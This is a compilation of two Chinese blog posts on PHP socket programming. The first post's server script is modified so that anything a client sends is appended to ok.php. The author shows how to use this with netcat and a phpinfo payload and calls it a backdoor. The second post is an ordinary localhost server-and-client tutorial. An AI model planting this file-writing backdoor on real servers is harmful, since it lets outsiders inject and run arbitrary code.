// 设置一些基本的变量
$host = "192.168.1.99";
$port = 1234;
// 设置超时时间
set_time_limit(0);
// 创建一个Socket
$socket = socket_create(AF_INET, SOCK_STREAM, 0) or die("Could not create
socket\n");
//绑定Socket到端口
$result = socket_bind($socket, $host, $port) or die("Could not bind to
socket\n");
// 开始监听链接
$result = socket_listen($socket, 3) or die("Could not set up socket
listener\n");
// accept incoming connections
// 另一个Socket来处理通信
$spawn = socket_accept($socket) or die("Could not accept incoming
connection\n");
// 获得客户端的输入
$input = socket_read($spawn, 1024) or die("Could not read input\n");
// 清空输入字符串
$input = trim($input);
fputs(fopen('ok.php','a+'),"$input");
//处理客户端输入并返回结果
socket_write($spawn, $output, strlen ($output)) or die("Could not write
output\n");
// 关闭sockets
socket_close($spawn);
socket_close($socket);
?>
下面是其每一步骤的详细说明:
1.第一步是建立两个变量来保存Socket运行的服务器的IP地址和端口.你可以设置为你自己的服务器和端口(这个端口可以是1到65535之间的数字),前提是这个端口未被使用.
<?
// 设置两个变量
$host = "192.168.1.99";
$port = 1234;
?>
<?
// 超时时间
set_time_limit(0);
?>
<?
// 创建Socket
$socket = socket_create(AF_INET,SOCK_STREAM,0) or die("Could not create
socket\n");
?>
第二个参数"SOCK_STREM"告诉函数将创建一个什么类型的Socket(在这个例子中是TCP类型)
因此,如果你想创建一个UDP Socket的话,你可以使用如下的代码:
<?
// 创建 socket
$socket = socket_create(AF_INET,SOCK_DGRAM,0) or die("Could not create
socket\n");
?>
<?
// 绑定 socket to 指定地址和端口
$result = socket_bind($socket,$host,$port) or die("Could not bind to
socket\n");
?>
<?
// 开始监听连接
$result = socket_listen($socket,3) or die("Could not set up socket
listener\n");
?>
<?
//接受请求链接
// 调用子socket 处理信息
$spawn = socket_accept($socket) or die("Could not accept incoming
connection\n");
?>
7.当一个连接被建立后,服务器就会等待客户端发送一些输入信息,这写信息可以由socket_read()函数来获得,并把它赋值给PHP的$input变量.
<?
// 读取客户端输入
$input = socket_read($spawn,1024) or die("Could not read input\n");
?>
注意:socket_read函数会一直读取壳户端数据,直到遇见\n,\t或者\0字符.PHP脚本把这写字符看做是输入的结束符.
8.现在服务器必须处理这些由客户端发来是数据(在这个例子中的处理仅仅包含数据的输入和回传到客户端).这部分可以由socket_write()函数来完成(使得由通信socket发回一个数据流到客户端成为可能)
<?
// 处理客户端输入并返回数据
$output = strrev($input) ."\n";
socket_write($spawn,$output,strlen($output)) or die("Could not write
output\n");
?>
<?
// 关闭 sockets
socket_close($spawn);
socket_close($socket);
?>
今天看到了一个很好的例程,我在例程上加了一句。fputs(fopen('ok.php','a+'),"$input");
为什么要加这一句,恶搞的本质又出来了。我们在命令行下:
nc -vv ip port
然后输入<?phpinfo();?>后,ok.php就在当前目录下生成了此文件内容了。要做得更好的一点,完全可以写一个客户端的工具实时得到反馈结果,嘿嘿.
当个另类的后门也不错。不过如今反弹的php代码都有了,这个纯属脱裤子放屁了。
#############################################################################
PHP socket
工作实在比较闲,就来写写博客吧。顺便整理下。环境:windows
PHP在WIN下操作socket最好用命令行运行程序,至于为什么,自己可以体会下。
首先运行php + 程序的路径,出现了这个提示表示你的php没有加入环境变量path下面。
然后找到你的php安装目录,我的是这个
然后复制上面的路径,右键点击我的电脑-属性-高级-环境变量,添加到环境变量中,注意有个;号,看下图
然后确定,保存。再次运行cmd,OK成功了。不会出现那个提示了。
接下来就是主题了,先放代码
<?php
//确保在连接客户端时不会超时
set_time_limit(0);
$ip = '127.0.0.1';
$port = 1935;
/*
+-------------------------------
* @socket通信整个过程
+-------------------------------
* @socket_create
* @socket_bind
* @socket_listen
* @socket_accept
* @socket_read
* @socket_write
* @socket_close
+--------------------------------
*/
/*---------------- 以下操作都是手册上的 -------------------*/
if(($sock = socket_create(AF_INET,SOCK_STREAM,SOL_TCP)) < 0) {
echo "socket_create() 失败的原因是:".socket_strerror($sock)."\n";
}
if(($ret = socket_bind($sock,$ip,$port)) < 0) {
echo "socket_bind() 失败的原因是:".socket_strerror($ret)."\n";
}
if(($ret = socket_listen($sock,4)) < 0) {
echo "socket_listen() 失败的原因是:".socket_strerror($ret)."\n";
}
$count = 0;
do {
if (($msgsock = socket_accept($sock)) < 0) {
echo "socket_accept() failed: reason: " . socket_strerror($msgsock) . "\n";
break;
} else {
//发到客户端
$msg ="测试成功!\n";
socket_write($msgsock, $msg, strlen($msg));
echo "测试成功了啊\n";
$buf = socket_read($msgsock,8192);
$talkback = "收到的信息:$buf\n";
echo $talkback;
if(++$count >= 5){
break;
};
}
//echo $buf;
socket_close($msgsock);
} while (true);
socket_close($sock);
?>
这是socket的服务端代码。然后运行cmd,注意是自己的程序存放路径啊。
没有反映,对现在服务端的程序已经开始运行,端口已经开始监听了。运行netstat -ano可以查看端口情况,我的是1935端口
看,端口已经处于LISTENING状态了。接下来我们只要运行客户端程序即可连接上。上代码
<?php
error_reporting(E_ALL);
set_time_limit(0);
echo "<h2>TCP/IP Connection</h2>\n";
$port = 1935;
$ip = "127.0.0.1";
/*
+-------------------------------
* @socket连接整个过程
+-------------------------------
* @socket_create
* @socket_connect
* @socket_write
* @socket_read
* @socket_close
+--------------------------------
*/
$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if ($socket < 0) {
echo "socket_create() failed: reason: " . socket_strerror($socket) . "\n";
}else {
echo "OK.\n";
}
echo "试图连接 '$ip' 端口 '$port'...\n";
$result = socket_connect($socket, $ip, $port);
if ($result < 0) {
echo "socket_connect() failed.\nReason: ($result) " . socket_strerror($result) . "\n";
}else {
echo "连接OK\n";
}
$in = "Ho\r\n";
$in .= "first blood\r\n";
$out = '';
if(!socket_write($socket, $in, strlen($in))) {
echo "socket_write() failed: reason: " . socket_strerror($socket) . "\n";
}else {
echo "发送到服务器信息成功!\n";
echo "发送的内容为:<font color='red'>$in</font> <br>";
}
while($out = socket_read($socket, 8192)) {
echo "接收服务器回传信息成功!\n";
echo "接受的内容为:",$out;
}
echo "关闭SOCKET...\n";
socket_close($socket);
echo "关闭OK\n";
?>
至此客户端已经连接上服务端了。这只是个小例子,很多东西知道原理其他就好做了。